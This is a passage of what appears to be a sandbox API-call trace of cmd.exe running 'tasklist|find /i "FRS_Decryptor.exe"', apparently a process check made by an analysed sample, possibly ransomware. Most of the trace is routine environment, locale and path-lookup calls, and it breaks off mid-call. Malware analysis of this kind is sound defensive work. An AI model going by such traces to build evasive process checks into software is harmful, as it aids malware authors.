timer=0x0) returned 0x5aa500b2 [0135.433] srand (_Seed=0x5aa500b2) [0135.433] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0135.433] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0135.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0135.434] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd340c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0135.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.434] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0135.434] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.434] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.434] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.434] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.434] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.434] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.434] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.434] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.434] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.434] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb7f7b8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0135.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xb7f7b8, lpFilePart=0xb7f7b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb7f7b4*="Desktop") returned 0x1c [0135.434] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0135.435] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xb7f530 | out: lpFindFileData=0xb7f530) returned 0xd342d8 [0135.435] FindClose (in: hFindFile=0xd342d8 | out: hFindFile=0xd342d8) returned 1 [0135.435] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xb7f530 | out: lpFindFileData=0xb7f530) returned 0xd342d8 [0135.435] FindClose (in: hFindFile=0xd342d8 | out: hFindFile=0xd342d8) returned 1 [0135.435] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0135.435] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xb7f530 | out: lpFindFileData=0xb7f530) returned 0xd342d8 [0135.435] FindClose (in: hFindFile=0xd342d8 | out: hFindFile=0xd342d8) returned 1 [0135.435] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0135.435] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0135.435] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0135.435] GetEnvironmentStringsW () returned 0xd36190* [0135.436] FreeEnvironmentStringsA (penv="=") returned 1 [0135.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0135.436] GetConsoleOutputCP () returned 0x1b5 [0135.436] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0135.436] GetUserDefaultLCID () returned 0x409 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xb7f8e4, cchData=128 | out: lpLCData="0") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xb7f8e4, cchData=128 | out: lpLCData="0") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xb7f8e4, cchData=128 | out: lpLCData="1") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0135.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0135.437] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.438] GetConsoleTitleW (in: lpConsoleTitle=0xd34e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0135.439] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0135.439] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0135.439] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0135.440] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0135.440] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0135.440] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0135.440] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0135.440] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0135.440] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0135.440] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0135.441] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0135.441] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0135.441] _wcsicmp (_String1="IF", _String2="find") returned 3 [0135.441] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0135.441] _wcsicmp (_String1="REM", _String2="find") returned 12 [0135.441] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0135.442] _pipe (in: _PtHandles=0xd351f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd351f0) returned 0 [0135.442] _dup (_FileHandle=1) returned 5 [0135.442] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0135.442] _close (_FileHandle=4) returned 0 [0135.443] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0135.443] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0135.443] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0135.443] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0135.443] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0135.443] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0135.443] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0135.443] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0135.443] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0135.443] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0135.443] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0135.443] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0135.443] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0135.443] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0135.443] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0135.443] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0135.443] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0135.443] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0135.443] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0135.443] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0135.443] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0135.443] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0135.443] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0135.443] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0135.443] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0135.443] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0135.443] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0135.443] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0135.443] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0135.443] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0135.443] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0135.443] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0135.443] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0135.443] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0135.443] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0135.443] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0135.443] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0135.443] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0135.443] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0135.443] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0135.444] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0135.444] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0135.444] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0135.444] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0135.444] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0135.444] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0135.444] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0135.444] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0135.444] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0135.444] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0135.444] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0135.444] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0135.444] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0135.444] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0135.444] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0135.444] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0135.444] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0135.444] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0135.444] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0135.444] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0135.444] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0135.444] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0135.444] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0135.444] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0135.444] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0135.444] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0135.444] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0135.444] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0135.444] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0135.444] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0135.444] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0135.444] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0135.444] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0135.444] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0135.445] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0135.445] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0135.445] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0135.445] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0135.445] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0135.445] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0135.445] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0135.445] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0135.445] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0135.445] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0135.445] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0135.445] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0135.445] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0135.445] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0135.445] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0135.445] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0135.445] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0135.445] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0135.445] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0135.445] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0135.445] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0135.445] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0135.445] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0135.445] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0135.445] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0135.445] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0135.446] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0135.446] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0135.446] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0135.446] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0135.446] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0135.446] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0135.446] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0135.446] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0135.446] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0135.446] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0135.446] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0135.446] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0135.446] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0135.446] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0135.446] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0135.446] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0135.446] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0135.446] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0135.446] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0135.446] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0135.446] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0135.446] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0135.446] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0135.446] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0135.446] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0135.446] SetErrorMode (uMode=0x0) returned 0x0 [0135.446] SetErrorMode (uMode=0x1) returned 0x0 [0135.446] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd35228, lpFilePart=0xb7f744 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb7f744*="Desktop") returned 0x1c [0135.446] SetErrorMode (uMode=0x0) returned 0x1 [0135.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.447] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.451] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.451] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.451] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xffffffff [0135.451] GetLastError () returned 0x2 [0135.451] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.451] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xd35530 [0135.452] FindClose (in: hFindFile=0xd35530 | out: hFindFile=0xd35530) returned 1 [0135.452] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xffffffff [0135.452] GetLastError () returned 0x2 [0135.452] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xd35530 [0135.452] FindClose (in: hFindFile=0xd35530 | out: hFindFile=0xd35530) returned 1 [0135.452] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.452] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.452] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0135.452] SetErrorMode (uMode=0x0) returned 0x0 [0135.452] SetErrorMode (uMode=0x1) returned 0x0 [0135.452] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd3a3c0, lpFilePart=0xb7f4ec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb7f4ec*="Desktop") returned 0x1c [0135.452] SetErrorMode (uMode=0x0) returned 0x1 [0135.452] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.452] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.452] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.452] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.452] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xffffffff [0135.453] GetLastError () returned 0x2 [0135.453] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xd35628 [0135.453] FindClose (in: hFindFile=0xd35628 | out: hFindFile=0xd35628) returned 1 [0135.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xffffffff [0135.453] GetLastError () returned 0x2 [0135.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xd35628 [0135.453] FindClose (in: hFindFile=0xd35628 | out: hFindFile=0xd35628) returned 1 [0135.453] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.453] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.453] GetConsoleTitleW (in: lpConsoleTitle=0xb7f774, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.453] InitializeProcThreadAttributeList (in: lpAttributeList=0xb7f6a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb7f684 | out: lpAttributeList=0xb7f6a0, lpSize=0xb7f684) returned 1 [0135.453] UpdateProcThreadAttribute (in: lpAttributeList=0xb7f6a0, dwFlags=0x0, Attribute=0x60001, lpValue=0xb7f68c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb7f6a0, lpPreviousValue=0x0) returned 1 [0135.453] GetStartupInfoW (in: lpStartupInfo=0xb7f6d8 | out: lpStartupInfo=0xb7f6d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x154, hStdError=0x2c)) [0135.453] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.453] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0135.453] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.454] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.454] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0135.455] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xb7f628*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", 